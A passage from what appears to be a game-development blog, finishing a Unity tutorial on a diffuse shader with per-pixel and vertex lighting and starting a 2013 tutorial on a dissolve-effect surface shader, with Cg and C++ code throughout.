<span class="k">struct</span> <span class="nc">vertex_input</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">vertex</span> <span class="o">:</span> <span class="n">POSITION</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">NORMAL</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">texcoord</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="k">struct</span> <span class="nc">vertex_output</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">lightDir</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">TEXCOORD2</span><span class="p">;</span>
<span class="n">LIGHTING_COORDS</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="p">};</span></code></pre></figure>
<p>Output-wise, we need the obvious position, uv coords and vertex normal. We also need the vector from our vertex to the current light in object space. Finally, we need to grab light attenuation information, and shadow info. Unity has a macro for grabbing those last two items, LIGHTING_COORDS(x,y). This macro will put lighting info into TEXCOORDX and shadow info into TEXCOORDY. This takes care of the messy business of dealing with all the different datatypes needed for different types of lights.</p>
<p>Just remember to include UnityCG.cginc, Lighting.cginc and AutoLight.cginc if you’re using the Unity macros.</p>
<p>Ok, things are looking pretty good here. Let’s move on to the vertex program. For the most part, the vertex program for each pass is fairly normal (for now, we’ll come back to this later when we talk about vertex lights).</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vertex_output</span> <span class="nf">vert</span> <span class="p">(</span><span class="n">vertex_input</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vertex_output</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span> <span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">.</span><span class="n">xy</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">normal</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">ObjSpaceLightDir</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">TRANSFER_VERTEX_TO_FRAGMENT</span><span class="p">(</span><span class="n">o</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The 2 lines before the return bear a bit more explanation. ObjSpaceLightDir(float4 x) is a helper provided in UnityCG.cginc. Simply put, it returns a vector going from the current vertex to the light in object space. You can check out its definition in UnityCG.cginc if you’re interested in the details, but for our purposes, using the built in function will be fine.</p>
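<p>For the curious, here is my rough understanding of what ObjSpaceLightDir boils down to, written as plain C++ rather than Cg. This is a simplified sketch, not Unity’s actual source: objSpaceLightDirSketch is a made-up name, the light is assumed to already be in object space, and object scale is ignored. The trick is the w component of the light position, which I’m assuming is 0 for directional lights and 1 for everything else.</p>

```cpp
#include <array>

using Vec3 = std::array<float, 3>;
using Vec4 = std::array<float, 4>;

// lightPosObj: the light's position (w = 1) or direction (w = 0),
//              assumed to already be in object space.
// vertex:      the vertex position in object space.
// Returns an un-normalized vector pointing from the vertex toward the light.
Vec3 objSpaceLightDirSketch(const Vec4& lightPosObj, const Vec3& vertex) {
    const float w = lightPosObj[3];
    // For directional lights w is 0, so the vertex position drops out
    // and we just get the light's direction back.
    return {lightPosObj[0] - vertex[0] * w,
            lightPosObj[1] - vertex[1] * w,
            lightPosObj[2] - vertex[2] * w};
}
```

<p>Note that the result isn’t normalized, which is why the fragment program normalizes lightDir before using it.</p>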
<p>TRANSFER_VERTEX_TO_FRAGMENT is the macro provided to transfer the data declared with LIGHTING_COORDS to the fragment program. It does some co-ordinate space conversions as well, but since we’re just going to grab the end values from all these calculations for our light attenuation, we don’t need to worry about them right now. For now our goal is just a pixel shader that looks like the Diffuse surface shader.</p>
<p>Alright, on to the fragment program for our passes. First, we’re going to need to grab the colour from the texture we have applied to our mesh, and do a colour multiply on it to take into account the inspector inputs we defined at the top of the page. Then we’re going to get the lighting attenuation value from Unity. Finally, we’re going to use the lightDir variable we set in the vertex shader to calculate the diffuse lighting value.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_MainTex_ST</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">_Color</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">_LightColor0</span><span class="p">;</span>
<span class="n">half4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vertex_output</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="o">*</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">zw</span><span class="p">);</span>
<span class="n">tex</span> <span class="o">*=</span> <span class="n">_Color</span><span class="p">;</span>
<span class="n">fixed</span> <span class="n">atten</span> <span class="o">=</span> <span class="n">LIGHT_ATTENUATION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="n">i</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">normal</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="n">UNITY_LIGHTMODEL_AMBIENT</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">tex</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="p">(</span><span class="n">tex</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">diff</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">tex</span><span class="p">.</span><span class="n">a</span> <span class="o">+</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">a</span> <span class="o">*</span> <span class="n">atten</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p>Not much here should be too out of the ordinary (save for the call to LIGHT_ATTENUATION). One thing that I’ve yet to be able to account for are the multiplications by 2 in the diffuse calculations. It’s very clear that this gives us an end result that looks like the built-in diffuse shader, but I’m not entirely sure why the built in diffuse shader would be multiplying these values by 2 either. Nevertheless, to hit our goal, we’re going to do it too. Just remember to leave out the ambient calculations in the ForwardAdd pass, otherwise things will be way too bright.</p>
<p>Great! If you try out the shader now, it should look pretty darn good. Don’t get too comfy though, there’s still one more task to do. If you add more than 3 lights to your scene you will notice the shader starts behaving strangely right now. This is because we haven’t specified what we want to do with Vertex lights. Unity only supports up to 4 Per-Pixel lights, but it will allow 4 more lights to be used on a per vertex basis. Unfortunately our current code doesn’t take into account these lights, so we need to add support for them now.</p>
<p>Step one is to add a float3 to our output struct to hold the summed colour of the lights for the current vertex. Next we need to convert our object space position and normal into world space, and pass them to a for loop that calculates the diffuse lighting for each of the 4 possible vertex lights. Once we get that colour into our frag shader, we just add it to the colour we’re already multiplying the texture by. The end result isn’t exactly identical to the built in shaders, but it’s a reasonable approximation.</p>
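<p>Before getting to the shader code, here is the vertex light loop described above as a plain C++ sketch, in case the maths is easier to follow that way. The VertexLight struct and the vertexLighting function are made up for this example; in the real shader the positions, colours and attenuation values come from Unity’s built-in uniforms. The zero-distance check is my own addition to keep the sketch from dividing by zero.</p>

```cpp
#include <algorithm>
#include <array>
#include <cmath>
#include <cstddef>

using Vec3 = std::array<float, 3>;

// Hypothetical container for one vertex light's data.
struct VertexLight {
    Vec3 position;  // world space
    Vec3 color;
    float atten;    // attenuation factor applied to squared distance
};

// Sums the diffuse contribution of up to 4 vertex lights at one vertex.
Vec3 vertexLighting(const Vec3& worldPos, const Vec3& worldNormal,
                    const Vec3& materialColor,
                    const std::array<VertexLight, 4>& lights) {
    Vec3 sum{0.0f, 0.0f, 0.0f};
    for (const VertexLight& light : lights) {
        const Vec3 toLight{light.position[0] - worldPos[0],
                           light.position[1] - worldPos[1],
                           light.position[2] - worldPos[2]};
        const float squaredDistance = toLight[0] * toLight[0] +
                                      toLight[1] * toLight[1] +
                                      toLight[2] * toLight[2];
        if (squaredDistance <= 0.0f) continue;  // can't normalize a zero vector

        // N dot L, using the normalized direction to the light.
        const float invLength = 1.0f / std::sqrt(squaredDistance);
        const float nDotL = (worldNormal[0] * toLight[0] +
                             worldNormal[1] * toLight[1] +
                             worldNormal[2] * toLight[2]) * invLength;
        const float diffuse = std::max(0.0f, nDotL);
        const float attenuation = 1.0f / (1.0f + light.atten * squaredDistance);

        for (std::size_t k = 0; k < 3; ++k) {
            sum[k] += attenuation * light.color[k] * materialColor[k] * diffuse * 2.0f;
        }
    }
    return sum;
}
```

<p>The result is a single colour per vertex, which gets interpolated across the triangle and added in the fragment program. That interpolation is why vertex lights are cheaper, and blurrier, than pixel lights.</p>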
<p>Our new ForwardBase vertex_output struct looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">vertex_output</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">pos</span> <span class="o">:</span> <span class="n">SV_POSITION</span><span class="p">;</span>
<span class="n">float2</span> <span class="n">uv</span> <span class="o">:</span> <span class="n">TEXCOORD0</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">lightDir</span> <span class="o">:</span> <span class="n">TEXCOORD1</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normal</span> <span class="o">:</span> <span class="n">TEXCOORD2</span><span class="p">;</span>
<span class="n">LIGHTING_COORDS</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">)</span>
<span class="n">float3</span> <span class="n">vertexLighting</span> <span class="o">:</span> <span class="n">TEXCOORD5</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>That pass’ vertex function is now:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"> <span class="n">vertex_output</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vertex_input</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vertex_output</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span> <span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">.</span><span class="n">xy</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">ObjSpaceLightDir</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">normal</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">;</span>
<span class="n">TRANSFER_VERTEX_TO_FRAGMENT</span><span class="p">(</span><span class="n">o</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertexLighting</span> <span class="o">=</span> <span class="n">float3</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.0</span><span class="p">);</span>
<span class="cp">#ifdef VERTEXLIGHT_ON
</span>
<span class="n">float3</span> <span class="n">worldN</span> <span class="o">=</span> <span class="n">mul</span><span class="p">((</span><span class="n">float3x3</span><span class="p">)</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">SCALED_NORMAL</span><span class="p">);</span>
<span class="n">float4</span> <span class="n">worldPos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">index</span> <span class="o"><</span> <span class="mi">4</span><span class="p">;</span> <span class="n">index</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">lightPosition</span> <span class="o">=</span> <span class="n">float4</span><span class="p">(</span><span class="n">unity_4LightPosX0</span><span class="p">[</span><span class="n">index</span><span class="p">],</span>
<span class="n">unity_4LightPosY0</span><span class="p">[</span><span class="n">index</span><span class="p">],</span>
<span class="n">unity_4LightPosZ0</span><span class="p">[</span><span class="n">index</span><span class="p">],</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">vertexToLightSource</span> <span class="o">=</span> <span class="n">float3</span><span class="p">(</span><span class="n">lightPosition</span> <span class="o">-</span> <span class="n">worldPos</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">lightDirection</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">vertexToLightSource</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">squaredDistance</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">vertexToLightSource</span><span class="p">,</span> <span class="n">vertexToLightSource</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">attenuation</span> <span class="o">=</span> <span class="mf">1.0</span> <span class="o">/</span> <span class="p">(</span><span class="mf">1.0</span> <span class="o">+</span> <span class="n">unity_4LightAtten0</span><span class="p">[</span><span class="n">index</span><span class="p">]</span> <span class="o">*</span> <span class="n">squaredDistance</span><span class="p">);</span>
<span class="n">float3</span> <span class="n">diffuseReflection</span> <span class="o">=</span> <span class="n">attenuation</span> <span class="o">*</span> <span class="n">float3</span><span class="p">(</span><span class="n">unity_LightColor</span><span class="p">[</span><span class="n">index</span><span class="p">])</span>
<span class="o">*</span> <span class="n">float3</span><span class="p">(</span><span class="n">_Color</span><span class="p">)</span> <span class="o">*</span> <span class="n">max</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="n">dot</span><span class="p">(</span><span class="n">worldN</span><span class="p">,</span> <span class="n">lightDirection</span><span class="p">));</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertexLighting</span> <span class="o">=</span> <span class="n">o</span><span class="p">.</span><span class="n">vertexLighting</span> <span class="o">+</span> <span class="n">diffuseReflection</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
<span class="p">}</span>
<span class="cp">#endif
</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>and the ForwardBase fragment function is:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vertex_output</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">i</span><span class="p">.</span><span class="n">lightDir</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">atten</span> <span class="o">=</span> <span class="n">LIGHT_ATTENUATION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
<span class="n">fixed4</span> <span class="n">tex</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">tex</span> <span class="o">*=</span> <span class="n">_Color</span> <span class="o">+</span> <span class="n">fixed4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">vertexLighting</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="n">fixed</span> <span class="n">diff</span> <span class="o">=</span> <span class="n">saturate</span><span class="p">(</span><span class="n">dot</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">normal</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">lightDir</span><span class="p">));</span>
<span class="n">fixed4</span> <span class="n">c</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">=</span> <span class="p">(</span><span class="n">UNITY_LIGHTMODEL_AMBIENT</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">*</span> <span class="n">tex</span><span class="p">.</span><span class="n">rgb</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">rgb</span> <span class="o">+=</span> <span class="p">(</span><span class="n">tex</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="o">*</span> <span class="n">diff</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">atten</span> <span class="o">*</span> <span class="mi">2</span><span class="p">);</span>
<span class="n">c</span><span class="p">.</span><span class="n">a</span> <span class="o">=</span> <span class="n">tex</span><span class="p">.</span><span class="n">a</span> <span class="o">+</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">a</span> <span class="o">*</span> <span class="n">atten</span><span class="p">;</span>
<span class="k">return</span> <span class="n">c</span><span class="p">;</span>
<span class="err">}</span></code></pre></figure>
<p><a href="http://www.kylehalladay.com/dev/code/BetterDiffuse.shader">The source for the entire shader can be found here.</a></p>
<p>If you made it this far, congratulations! You now have a diffuse shader that takes into account all the lights Unity has to offer! As always, feedback is very welcome (especially if you’ve spotted errors, or things that I’ve gotten wrong). You can find me <a href="http://twitter.com/khalladay">on Twitter.</a> Hope this tutorial helped!</p>
Making a Dissolve Effect with Surface Shaders2013-09-28T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2013/09/28/How-to-dissolve-effect<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>I recently posted a shader pack which creates a cool “dissolve” (for lack of a better descriptor) effect, similar to the skin of Skyrim’s dragons during their death animation. As requested by reddit, this post details exactly what you need to know to write one of these shaders yourself and, hopefully, provides you with a good base from which to modify my shaders to your specific needs. I’m going to attempt to start from square one and not assume any shader experience on your part, but it will probably help if you have a general idea of how to build a basic shader beforehand.</p>
<p>Let’s get started.</p>
<h2>Getting Started</h2>
<p>The obvious first step here is to open up Unity and create a new shader. Unity is going to assume that you would like to create a surface shader, and pre-populate a lot of boilerplate code. Thanks Unity! Now, delete all of it and give yourself a nice, clean slate to work with.</p>
<p>Now that that’s cleaned up, start your shader with the lines:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>This is a bit of Unity-specific structure; the “Properties” section will allow us to define which variables we want to expose in the inspector, while the “SubShader” section will hold the actual code used in our shader.</p>
<p>Ok, now let’s figure out exactly what we will need the user to define. Take another look at what the effect looks like:</p>
<div align="center">
<img src="/images/post_images/2013-09-28/dissolve.png" /><br />
<font size="2">
Pretty snazzy, isn't it?
</font>
</div>
<p><br /></p>
<p>First off, we’re going to need the user to tell us what texture to put on the mesh for its normal undissolved state. The convention with Unity shaders is to call this texture _MainTex. So let’s add that to our properties.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The new line in properties shows how to define a regular texture for the inspector. We are going to call this variable _MainTex in our code, so that goes first. The “Main Texture” string in the parentheses defines what we want the inspector to display as this variable’s name. The subsequent “2D” declares that this slot in the inspector will accept a 2D texture. The “white”{} after the equals sign just sets the default value of this field to a generic white texture.</p>
<p>Ok, so now that we’ve figured out how to declare a texture, what other textures will we need? For this shader, we’re not going to use bump maps, so the only other texture we need is something to define the shape of the dissolve effect. Let’s call that _DissolveMap.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Ok, aside from our textures we also need 2 floats to control the progress of the effect and the size of the edge lines. However, we want to be able to control the range of these floats, so that our users don’t set them to values that are outside of what makes sense for our shader. One way of doing this is with the Range type. Any variable marked as type Range in the properties section will display in the inspector as a slider that moves between the low and high values we define.</p>
<p>Finally, I’m going to add a Color variable to allow us to define what colour the edges of the effect are.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>One thing to note is that we want the range of the dissolve effect to be functionally between 0.0 and 1.0, but in order to account for the line width, we need to expand the range in both directions by the maximum size the lines can be, otherwise lines will show up when the mesh should have no dissolve applied, and when it should be completely transparent.</p>
<p>Ok perfect, so now that that’s taken care of, let’s move on to actually writing a shader!</p>
<h2>Setting Things Up</h2>
<p>So now we move down to the SubShader tag. We’re going to be writing a surface shader. Surface shaders are a Unity-specific type of shorthand that takes care of all the lighting-specific shader code for you. It’s perfect for our purposes. What this also decides for us is that our shader needs to be written in CG (as opposed to GLSL or HLSL).</p>
<p>The first things we need to do with our shader are tell Unity to expect CG code, and what variables we want our code to access from outside of the shader itself.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
<span class="n">_LineColor</span><span class="p">(</span><span class="s">"Line Color"</span><span class="p">,</span> <span class="n">Color</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">)</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DissolveMap</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LineColor</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DissolveVal</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_LineWidth</span><span class="p">;</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Most of this is hopefully self-explanatory, but the one line that may not be is the #pragma… line. This is a surface shader specific pragma that tells Unity that we want our model to be lit according to the Lambert lighting model (diffuse lighting). Behind the scenes, Unity will add the code necessary for this lighting model to our shader when it compiles.</p>
<p>The other lines added are just declarations of the data we’re getting from the inspector, so that our shader knows to use this data. It’s important that the variable names used here are exactly the same as the ones we used in the Properties section. The datatypes here are just the CG equivalents of the types we defined above (there’s no such thing as a Color type in CG, so colours are represented as a 4 element vector).</p>
<p>Now, let’s add the rest of the structural code we need in order for our shader to start taking shape.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"MyDissolveShader"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span><span class="p">(</span><span class="s">"Main Texture"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveMap</span><span class="p">(</span><span class="s">"Dissolve Shape"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span><span class="p">{}</span>
<span class="n">_DissolveVal</span><span class="p">(</span><span class="s">"Dissolve Value"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="o">-</span><span class="mf">0.2</span><span class="p">,</span> <span class="mf">1.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">1.2</span>
<span class="n">_LineWidth</span><span class="p">(</span><span class="s">"Line Width"</span><span class="p">,</span> <span class="n">Range</span><span class="p">(</span><span class="mf">0.0</span><span class="p">,</span> <span class="mf">0.2</span><span class="p">))</span> <span class="o">=</span> <span class="mf">0.1</span>
